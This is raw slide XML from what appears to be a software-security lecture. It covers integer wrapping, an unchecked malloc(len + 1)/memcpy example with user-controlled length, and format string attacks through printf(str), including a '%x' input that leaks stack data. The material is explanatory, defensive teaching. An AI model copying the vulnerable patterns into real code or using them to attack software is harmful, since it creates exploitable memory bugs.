              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274234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en-US"/>
              <a:t>Integer wrapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205827" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Causing an integer to exceed maximum boundary value, or decrease below the minimum value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24679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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example 1: Addition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206851" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="1295400"/>
            <a:ext cx="4953000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>get_user_length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>if(!(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> = (char *)malloc(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> + 1))){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>perror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>    exit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>errno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>user_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="487386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r>
              <a:rPr lang="en-US"/>
              <a:t>Format String Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270340" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1447800"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>By taking advantage of programs that misuse the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> family of commands, an attacker can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Read arbitrary data form memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Manipulate information anywhere in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Format String Attacks is explained in detail by Tim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Newsham</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> at http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>forum.ouah.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>FormatString.PDF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28345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en-US"/>
              <a:t>Printf misuse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1447800"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>The correct way:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>The wrong way:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>The wrong way above will compile with no warnings or errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>The wrong way will run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
              <a:t>properly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352457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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88067" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="1524000"/>
            <a:ext cx="6553200" cy="4708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Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="628650" indent="-285750">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1943100">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2057400">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2171700">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2628900" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3086100" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3543300" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="40005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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software security?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ten Software Security Myths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common causes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Security Issues and Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Catch Exceptions and Unexpected Behaviors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3089235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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Printf misuse (continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1447800"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>If a software developer uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400"/>
              <a:t>wrong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400"/>
              <a:t> way, and attacker can place the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400"/>
              <a:t>right</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400"/>
              <a:t> kind of characters into the buffer so that it will be interpreted as a string format.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>What if the buffer is set to a value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400"/>
              <a:t>%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>The printf command would interpret the buffer as a format for outputting a hexadecimal value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Then it would go to the stack to grab a 32-bit word to print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306697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79BC7-9413-4E09-A221-E309D5E71EAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2819400"/>
            <a:ext cx="7772400" cy="2819400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Catch Exceptions and Unexpected Behaviors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Checked Exceptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Exceptions for Sensitive Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171741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DE1E-B87F-4194-A886-BCE5FC2273BE}"/>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206A77E9-222B-4F46-B6ED-EA98E2DC3226}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
